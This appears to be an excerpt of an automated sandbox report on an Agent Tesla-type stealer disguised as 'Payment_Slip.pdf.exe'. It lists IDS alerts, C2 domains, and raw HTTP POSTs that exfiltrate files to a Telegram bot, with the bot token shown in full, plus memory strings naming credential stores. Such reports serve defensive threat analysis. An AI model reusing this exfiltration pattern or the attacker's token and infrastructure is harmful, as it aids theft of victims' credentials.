Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49765 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49754 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49769 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49767 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49765 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49759 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49753 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49753 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49769 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49763 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49763 -> 149.154.167.220:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: ratianaana701.bounceme.net
Source: Malware configuration extractor URLs: milala.duckdns.org
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49720 -> 103.186.117.228:9373
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 66.102.1.109:587
Source: global traffic TCP traffic: 192.168.2.4:49766 -> 74.125.71.108:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7c30640d9Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63d5b8d96e57Host: api.telegram.orgContent-Length: 7553Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7d00704e1Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63d890031cdeHost: api.telegram.orgContent-Length: 7553Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7d9acfd77Host: api.telegram.orgContent-Length: 7553Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6fe1c3fdf431Host: api.telegram.orgContent-Length: 930Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd6fe75b7b2864Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd750e94b613a4Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd701f240ba35cHost: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd79f459671188Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd83b7ecb4b731Host: api.telegram.orgContent-Length: 71981Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd842d776ffebaHost: api.telegram.orgContent-Length: 1083Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd8431aa5955fdHost: api.telegram.orgContent-Length: 67150Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd8a92e30665c3Host: api.telegram.orgContent-Length: 67013Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd9f0bac1b425aHost: api.telegram.orgContent-Length: 67013Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5cba4639Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5cbf0ac5Host: api.telegram.orgContent-Length: 67009Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5ce792d8Host: api.telegram.orgContent-Length: 67009Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View IP Address: 104.26.12.205 104.26.12.205
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49726 -> 178.237.33.50:80
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 66.102.1.109:587
Source: global traffic TCP traffic: 192.168.2.4:49766 -> 74.125.71.108:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 11_2_0041936B
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: Payment_Slip.pdf.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: ratianaana701.bounceme.net
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: smtp.gmail.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7c30640d9Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003050000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067BC000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/r/r1.crl0
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/wr2/oBFYYahzgVI.crl0
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: svchost.exe, 0000000A.00000002.2826707788.000001F041607000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://eBhMtB.com
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000A.00000003.1203278984.000001F04149D000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.10.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001392000.00000004.00000020.00020000.00000000.sdmp, mHTmhPhJy.exe, dwn.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: Payment_Slip.pdf.exe, 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dwn.exe, 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, dwn.exe, 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, dwn.exe.5.dr String found in binary or memory: http://geoplugin.net/json.gp/C
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067BC000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/r1.crt0
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/wr2.crt0
